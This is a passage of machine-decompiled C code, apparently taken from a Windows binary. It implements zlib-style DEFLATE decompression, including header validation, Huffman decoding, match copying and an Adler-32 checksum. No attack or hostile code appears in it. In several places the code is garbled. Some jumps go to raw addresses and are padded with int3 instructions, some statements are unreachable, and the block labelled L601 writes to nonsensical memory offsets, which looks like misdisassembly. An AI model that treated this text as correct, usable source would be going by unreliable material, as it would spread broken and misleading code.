											if((( *( *(_t2870 + 8) + 8) << 8) +  *( *(_t2870 + 8) + 0xc)) % 0x1f != 0 || ( *( *(_t2870 + 8) + 0xc) & 0x00000020) != 0 || ( *( *(_t2870 + 8) + 8) & 0x0000000f) != 8) {
												 *(_t2870 - 0x110) = 1;
											} else {
												 *(_t2870 - 0x110) = 0;
											}
											_t1692 =  *(_t2870 - 0x110);
											 *(_t2870 - 0x10) = _t1692;
											_t2086 =  *(_t2870 + 0x20) & 0x00000004;
											if(_t2086 == 0) {
												_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
												if(1 > 0x8000) {
													L42:
													 *(_t2870 - 0x10c) = 1;
												} else {
													_t1692 = 1 << ( *( *(_t2870 + 8) + 8) >> 4) + 8;
													if( *(_t2870 - 0x88) + 1 < 1) {
														goto L42;
													} else {
														 *(_t2870 - 0x10c) = 0;
													}
												}
												_t2086 =  *(_t2870 - 0x10) |  *(_t2870 - 0x10c);
												 *(_t2870 - 0x10) = _t2086;
											}
											if( *(_t2870 - 0x10) == 0) {
												goto L48;
											} else {
												goto L45;
											}
										}
									}
								}
								goto L600;
							case 3:
								if(0 != 0) {
									goto L51;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L50;
									} else {
										 *(__ebp - 0xe4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L58;
									}
								}
								goto L600;
							case 4:
								if(0 != 0) {
									goto L67;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L66;
									} else {
										 *(__ebp - 0xb0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L74;
									}
								}
								goto L600;
							case 5:
								if(0 != 0) {
									goto L86;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L85;
									} else {
										 *(__ebp - 0xec) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L93;
									}
								}
								goto L600;
							case 6:
								if(0 != 0) {
									goto L101;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L100;
									} else {
										 *((char*)( *((intOrPtr*)(__ebp + 8)) +  *((intOrPtr*)(__ebp - 0x10)) + 0x2920)) =  *( *(__ebp - 4));
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L108;
									}
								}
								goto L600;
							case 7:
								if(0 != 0) {
									goto L141;
								} else {
									goto L140;
								}
								goto L600;
							case 8:
								if(0 == 0) {
								}
								goto L165;
							case 9:
								if(0 != 0) {
									goto L193;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L192;
									} else {
										 *(__ebp - 0xe0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L200;
									}
								}
								goto L600;
							case 0xa:
								if(0 != 0) {
									goto L215;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L214;
									} else {
										 *(__ebp - 0xc0) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L222;
									}
								}
								goto L600;
							case 0xb:
								if(0 != 0) {
									goto L293;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L292;
									} else {
										 *(__ebp - 0xb4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L300;
									}
								}
								goto L600;
							case 0xc:
								if(0 == 0) {
								}
								goto L318;
							case 0xd:
								if(0 != 0) {
									goto L325;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L324;
									} else {
										 *(__ebp - 0xbc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L332;
									}
								}
								goto L600;
							case 0xe:
								if(0 == 0) {
								}
								goto L344;
							case 0xf:
								if(0 != 0) {
									goto L367;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L366;
									} else {
										 *(__ebp - 0xc4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L374;
									}
								}
								goto L600;
							case 0x10:
								if(0 != 0) {
									goto L390;
								} else {
									goto L389;
								}
								goto L600;
							case 0x11:
								if(0 != 0) {
									goto L424;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L423;
									} else {
										 *(__ebp - 0xa4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L431;
									}
								}
								goto L600;
							case 0x12:
								if(0 != 0) {
									goto L454;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L453;
									} else {
										 *(__ebp - 0xd4) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L461;
									}
								}
								goto L600;
							case 0x13:
								if(0 != 0) {
									goto L479;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L478;
									} else {
										 *(__ebp - 0xdc) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L486;
									}
								}
								goto L600;
							case 0x14:
								if(0 != 0) {
									goto L536;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L535;
									} else {
										 *(__ebp - 0xa8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L543;
									}
								}
								goto L600;
							case 0x15:
								if(0 == 0) {
								}
								goto L581;
							case 0x16:
								if(0 == 0) {
								}
								goto L244;
							case 0x17:
								if(0 == 0) {
								}
								L45:
								 *(_t2870 - 0x1c) = 0xffffffff;
								_t2465 =  *(_t2870 + 8);
								 *_t2465 = 0x24;
								goto L600;
							case 0x18:
								if(0 == 0) {
								}
								goto L495;
							case 0x19:
								if(0 != 0) {
									goto L146;
								} else {
									goto L144;
								}
								goto L600;
							case 0x1a:
								if(0 == 0) {
								}
								goto L114;
							case 0x1b:
								if(0 == 0) {
								}
								goto L149;
							case 0x1c:
								if(0 != 0) {
									goto L555;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L554;
									} else {
										 *(__ebp - 0xac) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L562;
									}
								}
								goto L600;
							case 0x1d:
								if(0 != 0) {
									goto L570;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L569;
									} else {
										 *(__ebp - 0x90) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L577;
									}
								}
								goto L600;
							case 0x1e:
								if(0 != 0) {
									goto L122;
								} else {
									if( *(__ebp - 4) >=  *((intOrPtr*)(__ebp - 0x18))) {
										goto L121;
									} else {
										 *(__ebp - 0xb8) =  *( *(__ebp - 4)) & 0x000000ff;
										 *(__ebp - 4) =  &(( *(__ebp - 4))[1]);
										goto L129;
									}
								}
								goto L600;
							case 0x1f:
								if(0 != 0) {
									goto L135;
								} else {
									goto L134;
								}
								goto L600;
							case 0x20:
								if(0 != 0) {
									L504:
									 *(_t2870 - 0x1c) = 2;
									_t1692 =  *(_t2870 + 8);
									 *_t1692 = 0x35;
								} else {
									L503:
									_t2465 =  *(_t2870 - 0x14);
									if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
										 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t2870 + 0x14)) + ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88))));
										 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
										 *(_t2870 - 0x7c) =  *(_t2870 - 0x7c) + 1;
										L502:
										 *(_t2870 - 0x118) =  *(_t2870 - 0x10);
										_t2086 =  *(_t2870 - 0x10) - 1;
										 *(_t2870 - 0x10) = _t2086;
										if( *(_t2870 - 0x118) == 0) {
											L350:
											_t1747 =  *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4);
											if(_t1747 < 4) {
												L352:
												if( *(_t2870 - 8) >= 0xf) {
													L381:
													goto 0x1b0bac;
													_t2519 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
													 *(_t2870 - 0x3c) = _t2519;
													if( *(_t2870 - 0x3c) < 0) {
														 *(_t2870 - 0x50) = 0xa;
														do {
															 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2519 * 0 + 0x920 + ( !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001)) * 2));
															_t2519 =  *(_t2870 - 0x50) + 1;
															 *(_t2870 - 0x50) = _t2519;
														} while ( *(_t2870 - 0x3c) < 0);
													} else {
														 *(_t2870 - 0x50) =  *(_t2870 - 0x3c) >> 9;
														 *(_t2870 - 0x3c) =  *(_t2870 - 0x3c) & 0x000001ff;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x3c);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x50);
													_t1747 =  *(_t2870 - 8) -  *(_t2870 - 0x50);
													 *(_t2870 - 8) = _t1747;
													_t2086 = 0;
													if(0 != 0) {
														goto L352;
													} else {
														if( *(_t2870 - 0x10) < 0x100) {
															L389:
															_t2465 =  *(_t2870 - 0x14);
															if(_t2465 <  *((intOrPtr*)(_t2870 - 0x70))) {
																 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
																_t2086 =  *(_t2870 - 0x14) + 1;
																 *(_t2870 - 0x14) = _t2086;
																goto L417;
															} else {
																L390:
																 *(_t2870 - 0x1c) = 2;
																_t1692 =  *(_t2870 + 8);
																 *_t1692 = 0x18;
															}
														} else {
															goto L418;
														}
													}
												} else {
													if( *((intOrPtr*)(_t2870 - 0x18)) -  *(_t2870 - 4) >= 2) {
														_t1747 = ( *( *(_t2870 - 4) + (1 << 0)) & 0x000000ff) <<  *(_t2870 - 8) + 8;
														 *(_t2870 - 0xc) = ( *( *(_t2870 - 4) + _t2086 * 0) & 0x000000ff) <<  *(_t2870 - 8) | 0x00000001 |  *(_t2870 - 0xc);
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														goto L381;
													} else {
														L354:
														goto 0x1b0b73;
														_t2534 =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
														 *(_t2870 - 0x3c) = _t2534;
														if( *(_t2870 - 0x3c) < 0) {
															if( *(_t2870 - 8) <= 0xa) {
																goto L365;
															} else {
																 *(_t2870 - 0x50) = 0xa;
																while(1) {
																	goto 0x1b0b86;
																	_t1747 =  !( *(_t2870 - 0x3c)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x50) & 0x00000001);
																	 *(_t2870 - 0x3c) =  *((short*)( *(_t2870 + 8) + 0x40 + _t2534 * 0 + 0x920 + _t1747 * 2));
																	_t2534 =  *(_t2870 - 0x50) + 1;
																	 *(_t2870 - 0x50) = _t2534;
																	if( *(_t2870 - 0x3c) >= 0) {
																		break;
																	}
																	_t1747 =  *(_t2870 - 0x50) + 1;
																	if( *(_t2870 - 8) >= _t1747) {
																		continue;
																	}
																	break;
																}
																if( *(_t2870 - 0x3c) < 0) {
																	goto L365;
																} else {
																	goto L378;
																}
															}
														} else {
															_t1747 =  *(_t2870 - 0x3c) >> 9;
															 *(_t2870 - 0x50) = _t1747;
															if( *(_t2870 - 0x50) == 0 ||  *(_t2870 - 8) <  *(_t2870 - 0x50)) {
																L365:
																_t2086 =  *(_t2870 - 4);
																if(_t2086 <  *((intOrPtr*)(_t2870 - 0x18))) {
																	 *(_t2870 - 0xc4) =  *( *(_t2870 - 4)) & 0x000000ff;
																	 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																	goto L376;
																} else {
																	L366:
																	_t2465 =  *(_t2870 + 0x20) & 0x00000002;
																	if(_t2465 == 0) {
																		 *(_t2870 - 0xc4) = 0;
																		L374:
																		L376:
																		if(0 != 0) {
																			goto L365;
																		} else {
																			 *(_t2870 - 0xc) =  *(_t2870 - 0xc4) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																			_t1747 =  *(_t2870 - 8) + 8;
																			 *(_t2870 - 8) = _t1747;
																			if( *(_t2870 - 8) < 0xf) {
																				goto L354;
																			} else {
																				goto L378;
																			}
																		}
																	} else {
																		L367:
																		 *(_t2870 - 0x1c) = 1;
																		_t1692 =  *(_t2870 + 8);
																		 *_t1692 = 0x17;
																	}
																}
															} else {
																L378:
																goto L381;
															}
														}
													}
												}
											} else {
												_t2086 =  *((intOrPtr*)(_t2870 - 0x70)) -  *(_t2870 - 0x14);
												if(_t2086 >= 2) {
													if( *(_t2870 - 8) < 0xf) {
														_t1747 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
														 *(_t2870 - 0xc) = _t1747;
														 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
														 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
													}
													_t2164 =  *(_t2870 - 0xc) & 0x000003ff;
													 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1747 * 0 + 0x120 + _t2164 * 2));
													if( *(_t2870 - 0x38) < 0) {
														 *(_t2870 - 0x54) = 0xa;
														do {
															_t2164 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2164 * 0 + 0x920 + ( !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001)) * 2));
															 *(_t2870 - 0x38) = _t2164;
															 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
														} while ( *(_t2870 - 0x38) < 0);
													} else {
														 *(_t2870 - 0x54) =  *(_t2870 - 0x38) >> 9;
													}
													 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
													 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x54);
													_t1863 =  *(_t2870 - 8) -  *(_t2870 - 0x54);
													 *(_t2870 - 8) = _t1863;
													if(( *(_t2870 - 0x10) & 0x00000100) == 0) {
														if( *(_t2870 - 8) < 0xf) {
															_t1863 = ( *( *(_t2870 - 4)) & 0x0000ffff) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
															 *(_t2870 - 0xc) = _t1863;
															 *(_t2870 - 4) =  *(_t2870 - 4) + 2;
															 *(_t2870 - 8) =  *(_t2870 - 8) + 0x10;
														}
														_t2171 =  *(_t2870 - 0xc) & 0x000003ff;
														 *(_t2870 - 0x38) =  *((short*)( *(_t2870 + 8) + 0x40 + _t1863 * 0 + 0x120 + _t2171 * 2));
														if( *(_t2870 - 0x38) < 0) {
															 *(_t2870 - 0x54) = 0xa;
															do {
																_t1868 =  !( *(_t2870 - 0x38)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x54) & 0x00000001);
																_t2171 =  *((short*)( *(_t2870 + 8) + 0x40 + _t2171 * 0 + 0x920 + _t1868 * 2));
																 *(_t2870 - 0x38) = _t2171;
																 *(_t2870 - 0x54) =  *(_t2870 - 0x54) + 1;
															} while ( *(_t2870 - 0x38) < 0);
														} else {
															_t1868 =  *(_t2870 - 0x38) >> 9;
															 *(_t2870 - 0x54) = _t1868;
														}
														goto 0x1b0c1e;
														asm("int3");
														 *(_t2870 - 0xc) = _t1868 >> _t2171;
														 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x54);
														 *( *(_t2870 - 0x14)) =  *(_t2870 - 0x10);
														_t1872 =  *(_t2870 - 0x38) & 0x00000100;
														if(_t1872 == 0) {
															_t2086 =  *(_t2870 - 0x14);
															 *((char*)(_t2086 + (_t1872 << 0))) =  *(_t2870 - 0x38);
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 2;
															L417:
															goto L350;
														} else {
															 *(_t2870 - 0x14) =  *(_t2870 - 0x14) + 1;
															 *(_t2870 - 0x10) =  *(_t2870 - 0x38);
															goto L418;
														}
													} else {
														L418:
														 *(_t2870 - 0x10) =  *(_t2870 - 0x10) & 0x000001ff;
														if( *(_t2870 - 0x10) != 0x100) {
															_t1769 =  *(0x1aac1c +  *(_t2870 - 0x10) * 4);
															 *(_t2870 - 0x24) = _t1769;
															_t2180 =  *(_t2870 - 0x10);
															_t2566 =  *(0x1ab634 + _t2180 * 4);
															 *(_t2870 - 0x10) = _t2566;
															if( *(_t2870 - 0x24) == 0) {
																L437:
																if( *(_t2870 - 8) >= 0xf) {
																	L468:
																	_t2182 =  *((short*)( *(_t2870 + 8) + (_t1769 << 0) + 0x40 + 0x120 + ( *(_t2870 - 0xc) & 0x000003ff) * 2));
																	 *(_t2870 - 0x44) = _t2182;
																	if( *(_t2870 - 0x44) < 0) {
																		 *(_t2870 - 0x4c) = 0xa;
																		do {
																			 *(_t2870 - 0x44) =  *((short*)( *(_t2870 + 8) + (_t2182 << 0) + 0x40 + 0x920 + ( !( *(_t2870 - 0x44)) + ( *(_t2870 - 0xc) >>  *(_t2870 - 0x4c) & 0x00000001)) * 2));
																			_t2182 =  *(_t2870 - 0x4c) + 1;
																			 *(_t2870 - 0x4c) = _t2182;
																		} while ( *(_t2870 - 0x44) < 0);
																	} else {
																		 *(_t2870 - 0x4c) =  *(_t2870 - 0x44) >> 9;
																		 *(_t2870 - 0x44) =  *(_t2870 - 0x44) & 0x000001ff;
																	}
																	 *(_t2870 - 0x28) =  *(_t2870 - 0x44);
																	_t1769 =  *(_t2870 - 0xc) >>  *(_t2870 - 0x4c);
																	 *(_t2870 - 0xc) = _t1769;
																	 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x4c);
																	_t2566 = 0;
																	if(0 != 0) {
																		goto L437;
																	} else {
																		 *(_t2870 - 0x24) =  *(0x1ab0a0 +  *(_t2870 - 0x28) * 4);
																		_t2592 =  *(_t2870 - 0x28);
																		_t1789 =  *(0x1ab120 + _t2592 * 4);
																		 *(_t2870 - 0x28) = _t1789;
																		if( *(_t2870 - 0x24) == 0) {
																			L493:
																			 *(_t2870 - 0x7c) =  *(_t2870 - 0x14) -  *((intOrPtr*)(_t2870 + 0x14));
																			_t2465 =  *(_t2870 - 0x28);
																			if(_t2465 <=  *(_t2870 - 0x7c)) {
																				L498:
																				_t2211 = ( *(_t2870 - 0x7c) -  *(_t2870 - 0x28) &  *(_t2870 - 0x88)) +  *((intOrPtr*)(_t2870 + 0x14));
																				 *(_t2870 - 0x30) = _t2211;
																				if( *(_t2870 - 0x14) <=  *(_t2870 - 0x30)) {
																					_t2211 =  *(_t2870 - 0x30);
																					 *(_t2870 - 0xf4) = _t2211;
																				} else {
																					_t1789 =  *(_t2870 - 0x14);
																					 *(_t2870 - 0xf4) = _t1789;
																				}
																				if( *(_t2870 - 0xf4) +  *(_t2870 - 0x10) <=  *((intOrPtr*)(_t2870 - 0x70))) {
																					if( *(_t2870 - 0x10) < 9 ||  *(_t2870 - 0x10) >  *(_t2870 - 0x28)) {
																						L522:
																						goto L523;
																					} else {
																						 *((intOrPtr*)(_t2870 - 0x11c)) = ( *(_t2870 - 0x10) & 0xfffffff8) +  *(_t2870 - 0x30);
																						do {
																							 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2211 * 0));
																							 *((intOrPtr*)( *(_t2870 - 0x14) + (4 << 0))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (4 << 0)));
																							_t2211 =  *(_t2870 - 0x14) + 8;
																							 *(_t2870 - 0x14) = _t2211;
																							_t2612 =  *(_t2870 - 0x30) + 8;
																							 *(_t2870 - 0x30) = _t2612;
																							_t1789 =  *(_t2870 - 0x30);
																						} while (_t1789 <  *((intOrPtr*)(_t2870 - 0x11c)));
																						_t2086 =  *(_t2870 - 0x10) & 0x00000007;
																						 *(_t2870 - 0x10) = _t2086;
																						if( *(_t2870 - 0x10) >= 3) {
																							do {
																								goto L522;
																								L523:
																								 *( *(_t2870 - 0x14)) =  *((intOrPtr*)( *(_t2870 - 0x30) + _t1789 * 0));
																								 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 0)));
																								 *((char*)( *(_t2870 - 0x14) + (1 << 1))) =  *((intOrPtr*)( *(_t2870 - 0x30) + (1 << 1)));
																								_t2086 =  *(_t2870 - 0x14) + 3;
																								 *(_t2870 - 0x14) = _t2086;
																								 *(_t2870 - 0x30) =  *(_t2870 - 0x30) + 3;
																								_t1789 =  *(_t2870 - 0x10) - 3;
																								 *(_t2870 - 0x10) = _t1789;
																							} while ( *(_t2870 - 0x10) > 2);
																							if( *(_t2870 - 0x10) > 0) {
																								_t1798 =  *(_t2870 - 0x14);
																								 *_t1798 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2086 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									 *( *(_t2870 - 0x14) + (1 << 0)) =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t1798 << 0)));
																								}
																								_t2086 =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																								 *(_t2870 - 0x14) = _t2086;
																							}
																						} else {
																							if( *(_t2870 - 0x10) != 0) {
																								_t2086 =  *(_t2870 - 0x14);
																								 *_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + _t2612 * 0));
																								if( *(_t2870 - 0x10) > 1) {
																									_t2086 =  *((intOrPtr*)( *(_t2870 - 0x30) + (_t2086 << 0)));
																									 *( *(_t2870 - 0x14) + (1 << 0)) = _t2086;
																								}
																								 *(_t2870 - 0x14) =  *(_t2870 - 0x14) +  *(_t2870 - 0x10);
																							}
																						}
																						goto L350;
																					}
																					L601:
																					 *(_t2075 + 0x5189f455) =  *(_t2075 + 0x5189f455) | _t2086;
																					 *(_t2075 + 0x4289f045) =  *(_t2075 + 0x4289f045) | _t2086;
																					_t2870 = _t2870;
																					 *(_t2075 + 0x5189dc55) =  *(_t2075 + 0x5189dc55) | _t2086;
																					 *((intOrPtr*)(_t2075 + 0x4d8b0845)) =  *((intOrPtr*)(_t2075 + 0x4d8b0845)) - _t2086;
																					asm("cld");
																					 *( *(_t2870 + 0x10)) = _t2465 + 1 -  *(_t2870 + 0xc);
																					 *( *(_t2870 + 0x1c)) =  *(_t2870 - 0x14) -  *(_t2870 + 0x18);
																					if(( *(_t2870 + 0x20) & 0x00000009) != 0 &&  *(_t2870 - 0x1c) >= 0) {
																						 *(_t2870 - 0x58) =  *(_t2870 + 0x18);
																						 *(_t2870 - 0x98) =  *( *(_t2870 + 0x1c));
																						 *(_t2870 - 0x20) =  *( *(_t2870 + 8) + 0x1c) & 0x0000ffff;
																						 *(_t2870 - 0x2c) =  *( *(_t2870 + 8) + 0x1c) >> 0x10;
																						_t1700 =  *(_t2870 - 0x98);
																						_t1701 = _t1700 / 0x15b0;
																						_t2473 = _t1700 % 0x15b0;
																						 *(_t2870 - 0xa0) = _t2473;
																						while( *(_t2870 - 0x98) != 0) {
																							 *(_t2870 - 0x84) = 0;
																							while( *(_t2870 - 0x84) + 7 <  *(_t2870 - 0xa0)) {
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + _t2473 * 0) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 0)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 1)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 3) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + (1 << 2)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 5) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 6) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58) + 7) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t2473 =  *(_t2870 - 0x84) + 8;
																								 *(_t2870 - 0x84) = _t2473;
																								_t1701 =  *(_t2870 - 0x58) + 8;
																								 *(_t2870 - 0x58) = _t1701;
																							}
																							while(1) {
																								_t2097 =  *(_t2870 - 0x84);
																								if(_t2097 >=  *(_t2870 - 0xa0)) {
																									break;
																								}
																								 *(_t2870 - 0x20) = ( *( *(_t2870 - 0x58)) & 0x000000ff) +  *(_t2870 - 0x20);
																								 *(_t2870 - 0x58) =  *(_t2870 - 0x58) + 1;
																								 *(_t2870 - 0x2c) =  *(_t2870 - 0x2c) +  *(_t2870 - 0x20);
																								_t1701 =  *(_t2870 - 0x84) + 1;
																								 *(_t2870 - 0x84) = _t1701;
																							}
																							goto 0x1b0d69;
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							asm("int3");
																							 *(_t2870 - 0x20) = _t1701 % _t2097;
																							_t1706 =  *(_t2870 - 0x2c);
																							_t1701 = _t1706 / 0xfff1;
																							 *(_t2870 - 0x2c) = _t1706 % 0xfff1;
																							_t2473 =  *(_t2870 - 0x98) -  *(_t2870 - 0xa0);
																							 *(_t2870 - 0x98) = _t2473;
																							 *(_t2870 - 0xa0) = 0x15b0;
																						}
																						_t1704 = ( *(_t2870 - 0x2c) << 0x10) +  *(_t2870 - 0x20);
																						_t2094 =  *(_t2870 + 8);
																						 *((intOrPtr*)(_t2094 + 0x1c)) = _t1704;
																						if( *(_t2870 - 0x1c) == 0 && ( *(_t2870 + 0x20) & 0x00000001) != 0) {
																							goto 0x1b0d81;
																							asm("int3");
																							if( *((intOrPtr*)(_t1704 + 0x1c)) !=  *((intOrPtr*)(_t2094 + 0x10))) {
																								 *(_t2870 - 0x1c) = 0xfffffffe;
																							}
																						}
																					}
																					_t1688 =  *(_t2870 - 0x1c);
																					goto L622;
																				} else {
																					goto L502;
																				}
																			} else {
																				_t1789 =  *(_t2870 + 0x20) & 0x00000004;
																				if(_t1789 == 0) {
																					goto L498;
																				} else {
																					L495:
																					 *(_t2870 - 0x1c) = 0xffffffff;
																					_t2086 =  *(_t2870 + 8);
																					 *_t2086 = 0x25;
																				}
																			}
																		} else {
																			L476:
																			_t2233 =  *(_t2870 - 8);
																			if(_t2233 >=  *(_t2870 - 0x24)) {
																				L490:
																				goto 0x1b0cba;
																				asm("int3");
																				asm("int3");
																				asm("int3");
																				 *(_t2870 - 0x120) = (_t2592 << _t2233) - 0x00000001 &  *(_t2870 - 0xc);
																				 *(_t2870 - 0xc) =  *(_t2870 - 0xc) >>  *(_t2870 - 0x24);
																				 *(_t2870 - 8) =  *(_t2870 - 8) -  *(_t2870 - 0x24);
																				_t2592 = 0;
																				if(0 != 0) {
																					goto L476;
																				} else {
																					_t1789 =  *(_t2870 - 0x28) +  *(_t2870 - 0x120);
																					 *(_t2870 - 0x28) = _t1789;
																					goto L493;
																				}
																			} else {
																				L477:
																				_t2465 =  *(_t2870 - 4);
																				if(_t2465 <  *((intOrPtr*)(_t2870 - 0x18))) {
																					 *(_t2870 - 0xdc) =  *( *(_t2870 - 4)) & 0x000000ff;
																					 *(_t2870 - 4) =  *(_t2870 - 4) + 1;
																					goto L488;
																				} else {
																					L478:
																					_t1692 =  *(_t2870 + 0x20) & 0x00000002;
																					if(_t1692 == 0) {
																						 *(_t2870 - 0xdc) = 0;
																						L486:
																						L488:
																						if(0 != 0) {
																							goto L477;
																						} else {
																							_t2592 =  *(_t2870 - 0xdc) <<  *(_t2870 - 8) |  *(_t2870 - 0xc);
																							 *(_t2870 - 0xc) = _t2592;
																							 *(_t2870 - 8) =  *(_t2870 - 8) + 8;
																							_t2233 =  *(_t2870 - 8);
																							if(_t2233 <  *(_t2870 - 0x24)) {
																								goto L477;
																							} else {
																								goto L490;
																							}
																						}
																					} else {
																						L479:
																						 *(_t2870 - 0x1c) = 1;
																						_t2086 =  *(_t2870 + 8);
																						 *_t2086 = 0x1b;
																					}
																				}
